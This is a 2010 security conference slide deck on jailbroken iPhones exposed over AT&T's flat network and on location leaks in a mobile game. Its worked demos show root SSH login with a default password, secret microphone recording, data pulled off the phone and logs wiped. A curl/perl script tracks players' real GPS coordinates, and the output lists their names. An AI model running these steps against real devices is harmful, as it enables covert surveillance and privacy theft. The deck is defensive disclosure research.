Download - The New World of Smartphone Security
The New World of Smartphone Security
What Your iPhone Disclosed About You
Trevor HawthornManaging Partner
Friday, July 9, 2010
Today’s Talk
“Pockets full of shells”
Friday, July 9, 2010
Today’s Talk
“I can see you from my house”
Friday, July 9, 2010
Who I am now
Friday, July 9, 2010
Old Smartphone Best Practices
= Bad
= Good
Friday, July 9, 2010
New Smartphone Best Practices
1. IT will use the iPhone Configuration Utility so you can talk to Exchange, use the VPN, wireless, etc.
2. Get iFart, it’s hilarious.
Friday, July 9, 2010
If AT&T is in attendance:
Friday, July 9, 2010
If AT&T is in attendance:
• Facts about AT&T and me:
Friday, July 9, 2010
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
Friday, July 9, 2010
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
Friday, July 9, 2010
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
Friday, July 9, 2010
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
• Looking forward to years of receiving quality service from you
Friday, July 9, 2010
If AT&T is in attendance:
• Facts about AT&T and me:
• I enjoy my AT&T wireless service
• Feel that I have fantastic coverage everywhere I go at all times
• Am sure you have the largest/fastest 3G network, regardless of what VZW says
• Looking forward to years of receiving quality service from you
• Would love to chat
Friday, July 9, 2010
Jailbreaking
blackra1n
pwnagetool
Friday, July 9, 2010
It opens up a whole new world of applications
Friday, July 9, 2010
It opens up a whole new world of applications
• common Unix binaries
Friday, July 9, 2010
It opens up a whole new world of applications
• common Unix binaries
• sshd
Friday, July 9, 2010
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
Friday, July 9, 2010
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
• pirate software
Friday, July 9, 2010
It opens up a whole new world of applications
• common Unix binaries
• sshd
• tethering
• pirate software
• super easy to JB your phone
Friday, July 9, 2010
Impact on security
“Jail breaking removes 80% of the iPhone’s security precautions”
Charlie Miller, SyScan 2009
Friday, July 9, 2010
How many iPhones are jailbroken?
Friday, July 9, 2010
6.93%
[1]http://www.slideshare.net/pinchmedia/piracy-on-the-appstore
Friday, July 9, 2010
Global Stats
Friday, July 9, 2010
ifconfig root# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 16384
inet 127.0.0.1 netmask 0xff000000
en0: flags=8963<UP,BROADCAST,SMART,RUNNING,PROMISC,SIMPLEX,MULTICAST> mtu 1500
ether 00:21:e9:09:e3:4f
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
pdp_ip1: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
pdp_ip2: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
pdp_ip3: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1024
en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
inet 192.168.20.1 netmask 0xffffff00 broadcast 192.168.20.255
ether 0a:0b:ad:0b:ab:e0
Friday, July 9, 2010
Interfaces
Friday, July 9, 2010
en0 = 802.11 interface
Interfaces
Friday, July 9, 2010
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
Interfaces
Friday, July 9, 2010
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
Interfaces
Friday, July 9, 2010
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
pdp_ip2 = not sure
Interfaces
Friday, July 9, 2010
en0 = 802.11 interface
pdp_ip0 = primary cellular interface on APN: wap.cingular
pdp_ip1 = activates when retrieving visual voicemail on APN: acds.voicemail
pdp_ip2 = not sure
pdp_ip3 = used with tethering
Interfaces
Friday, July 9, 2010
ifconfig
pdp_ip0: flags=8011<UP,POINTOPOINT,MULTICAST> mtu 1450
inet 10.69.62.220 --> 10.69.62.220 netmask 0xffffffff
Friday, July 9, 2010
sshd
Friday, July 9, 2010
So what?
Friday, July 9, 2010
Until (about) October 16, 2009 AT&T did not filter device to device IP network
traffic.
Friday, July 9, 2010
AT&T’s Network
Most people think it looks like this:
/32
Friday, July 9, 2010
AT&T’s Network
Actually, more like this:
Multiple /16’s
Friday, July 9, 2010
Your smartphone (and laptop/blackberry, etc.) has been on one giant
flat network...
Friday, July 9, 2010
So I started looking around...
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Devices On the Network
10,589* IPs scanned
Count Port What?
83244
3,644
22 sshd80 http
2008 PDANet62078 iPhone Default
Friday, July 9, 2010
Other stuff out there
• Saw a Linux box with sshd
• Windows Mobile devices
• Blackberries
• Windows PC’s
• PDANet for the iPhone is an open proxy.
Friday, July 9, 2010
Friday, July 9, 2010
ssh access between phones
Trevors-iPhone:~ root# ssh [email protected]
Password: [alpine]
Nates-iPhone:~ root#
Nates-iPhone:~ root# id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),3(sys),4(tty),5(operator),8(procview),9(procmod),20(staff),29(certusers),80(admin)
Friday, July 9, 2010
Filesystem Guide
Interesting stuff:
/private/var/mobile/Library/Mail - Email (IMAP, Exchange, POP3, etc.)/private/var/mobile/Library/SMS - SMS Text Messages/private/var/mobile/Library/Voicemail - Voicemail in .amr format/private/var/mobile/Library/AddressBook - Contacts/private/var/mobile/Library/CallHistory - Call History/private/var/mobile/Library/Notes - Notes
Friday, July 9, 2010
/private/var/mobile/Library/CallHistory/call_history.db /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb /private/var/mobile/Library/AddressBook/AddressbookImages.sqlitedb /private/var/mobile/Library/Cookies/Cookies.plist /private/var/mobile/Library/Keyboard/dynamic-text.dat /private/var/mobile/Library/Mail/Accounts.plist /private/var/mobile/Library/Mail/(mail account name)/Deleted Messages /private/var/mobile/Library/Mail/(mail account name)/Sent Messages /private/var/mobile/Library/Mail/(mail account name)/INBOX /private/var/mobile/Library/Maps/History.plist /private/var/mobile/Library/YouTube/Bookmarks.plist /private/var/mobile/Library/Voicemail/(amr files) /private/var/mobile/Library/Voicemail/voicemail.db /private/var/mobile/Library/Safari/Bookmarks.plist /private/var/mobile/Library/Safari/History.plist /private/var/mobile/Library/Suspend.plist /private/var/mobile/Library/Safari/SuspendState.plist /private/var/mobile/Library/Safari/SMS/sms.db /private/var/mobile/Library/Preference/(various preference Plists) /private/var/mobile/Library/Notes/notes.db
Friday, July 9, 2010
Let’s do a bit more
Erica Utilities - cmd line utilities for the iPhone
recAudiorecAudio: Record audio from the onboard microphone.
findmeQueries the iPhone’s GPS API to return latitude/longitude
Friday, July 9, 2010
Attacker Victim
recAudio
scp/ssh
recording.aiff
10.69.62.10010.69.62.220
Friday, July 9, 2010
I can hear you typingTrevors-iPhone:~ root# scp bin/recAudio [email protected]:
Password:
recAudio 100% 19KB 1.3KB/s 00:00
Trevors-iPhone:~ root# ssh [email protected]
Password:
Nates-iPhone:~ root# ./recAudio
Start talking. Press ^C to finish.
Starting recording
^C
Interrupted.
Stopping recording
Friday, July 9, 2010
Nates-iPhone:~ root# ls -l *.aiff
-rw-r--r-- 1 root wheel 43178 Oct 2 22:35 2009-10-92\ at\ 22:35:04.aiff
Nates-iPhone:~ root# mv 2009-10-92\ at\ 22:35:04.aiff test.aiff
Trevors-iPhone: root# scp [email protected]:~/*.aiff .
Password:
test.aiff 100% 523KB 2.2KB/s 00:00
Nates-iPhone:~ root# rm test.aiff recAudio .bash_history
Nates-iPhone:~ root# last
wtmp begins at Fri Oct 2 22:41
Nates-iPhone:~ root#
Friday, July 9, 2010
Other bad things
Friday, July 9, 2010
Other bad things
• ./openURL tel://1-900-XXX-XXX
Friday, July 9, 2010
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
Friday, July 9, 2010
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
Friday, July 9, 2010
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
• apt-get install tcpdump nmap
Friday, July 9, 2010
Other bad things
• ./openURL tel://1-900-XXX-XXX
• ./openURL tel://911 or tel://mynumber
• Pillage filesystem: email, sms, notes, app data, etc.
• apt-get install tcpdump nmap
• go wild on whatever network en0 is connected to.
Friday, July 9, 2010
Worms and Exploits
Friday, July 9, 2010
Dutch Extortion
November 2009
Friday, July 9, 2010
ikee Worm
November 2009
Friday, July 9, 2010
Exploits
• Phone/Privacy.A* command line tool
• Phone/iBotNet.A* worm with C&C*Discovered by security firm Intego
Friday, July 9, 2010
Some good news
Friday, July 9, 2010
Some good news• AT&T does segment part of their network:
Friday, July 9, 2010
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
Friday, July 9, 2010
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
Friday, July 9, 2010
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
Friday, July 9, 2010
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
Friday, July 9, 2010
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
• decloak.net doesn’t really work in Mobile Safari
Friday, July 9, 2010
Some good news• AT&T does segment part of their network:
• e.g. I could not see friend in CA from DC
• But I could see friend in Boston
• No easy way to target specific individual (Identity to AT&T NAT IP address not super easy)
• No way to correlate 10.x.x.x IP to person via Safari
• decloak.net doesn’t really work in Mobile Safari
• Man this is slow...
Friday, July 9, 2010
email to ID user
<img src=”http://10.69.62.220/i.jpg”>
10.69.63.220:80 10.69.63.110
10.69.63.220:80 10.69.63.110src:10.69.63.110dst:10.69.63.220
Friday, July 9, 2010
What to do
• Don’t Jailbreak your phone if you care about security (sorry)
• Change root and mobile users’ passwords
• Attention Cydia Folks: Do not bind sshd to pdp interfaces; force password change upon install
• IT Folks: Policy on jailbroken iphones
• AT&T: Filter mobile to mobile IP traffic
Friday, July 9, 2010
Privacy and Location Based Apps
Friday, July 9, 2010
Location Based Apps
Friday, July 9, 2010
Location Based Apps
• Underworld: Sweet Deal
Friday, July 9, 2010
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
Friday, July 9, 2010
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
• Location matters, move product from point A to point B
Friday, July 9, 2010
Location Based Apps
• Underworld: Sweet Deal
• Drug trafficking game with candy
• Location matters, move product from point A to point B
• Phone sends high resolution coordinates to game server
Friday, July 9, 2010
Like Druglords
Friday, July 9, 2010
Underworld: Sweetdeal
Friday, July 9, 2010
Google Maps
Friday, July 9, 2010
Paros
• Client side proxy
• Configure iPhone to use machine running Paros’s IP address as proxy
• Watch what your apps send and receive
Friday, July 9, 2010
Request
Friday, July 9, 2010
Response
Friday, July 9, 2010
Used to monitor players
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Let’s pick a non-intel agency player
chezk
Friday, July 9, 2010
Request
Friday, July 9, 2010
Response
Friday, July 9, 2010
Lat/Lon to GMaps:
Friday, July 9, 2010
County Records
Friday, July 9, 2010
Friday, July 9, 2010
Ok neat, what else?
Friday, July 9, 2010
Near real-time geolocation tracking of players
Friday, July 9, 2010
cURL + perl + crontab = csv + gpsbabel = kml + Google Earth = EPIC screen shots
Friday, July 9, 2010
#/bin/sh## First login...#curl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -d @/home/trevor/iphone/login.xml --dump-header /home/trevor/iphone/headers.txt http://game.dl.a-steroids.com/TrafficServer/## Then update locationcurl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/update_loc.xml http://game.dl.a-steroids.com/TrafficServer/## Get GMap obhjectscurl -s -H "User-Agent: Underworld premium/1.4.0 CFNetwork/459 Darwin/10.0.0d3" -b /home/trevor/iphone/headers.txt -d @/home/trevor/iphone/gmap_update.xml http://game.dl.a-steroids.com/TrafficServer/
curl script
Friday, July 9, 2010
perl script#! /usr/bin/perl
use strict;use warnings;
# make single or multiline input into one scalar my $glob = join('',(<>));
# extract name-to-flag records my @records = $glob =~ /(<name>.*?<\/lon>)/ig;
for (@records){ my ($name,$lat,$lon) = $_ =~ qr|<name>(.*?)</name>.*?<lat>([\-\d\.]*)</lat><lon>([\-\d\.]*)</lon>|i; print "$lat,$lon,$name\n";}
Friday, July 9, 2010
perl script output
39.93220206723633,-77.47186584472656,poppyseed38.13753356933594,-77.06847380591797,Gadsden39.98429718017578,-78.30014190673828,Ziggety39.23520812988281,-77.40483581542969,Lexi39.855418395996094,-77.2717056274414,Tatu39.55705801582031,-77.4004086303711,Bigfoot36.67790985107422,-77.5902328491211,Jeneko38.297552490234375,-77.65829467773438,Stilbored39.891050720214844,-77.55879211025781,Timoteo39.66313247680664,-78.04374694824219,Gamber36.295310314697266,-78.14061126700984,UnderWear
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Friday, July 9, 2010
Comments/Feedback:
www.stratumsecurity.com
Twitter:
@packetwerks
@stratumsecurity
Special Thanks: Tiago Stock
Friday, July 9, 2010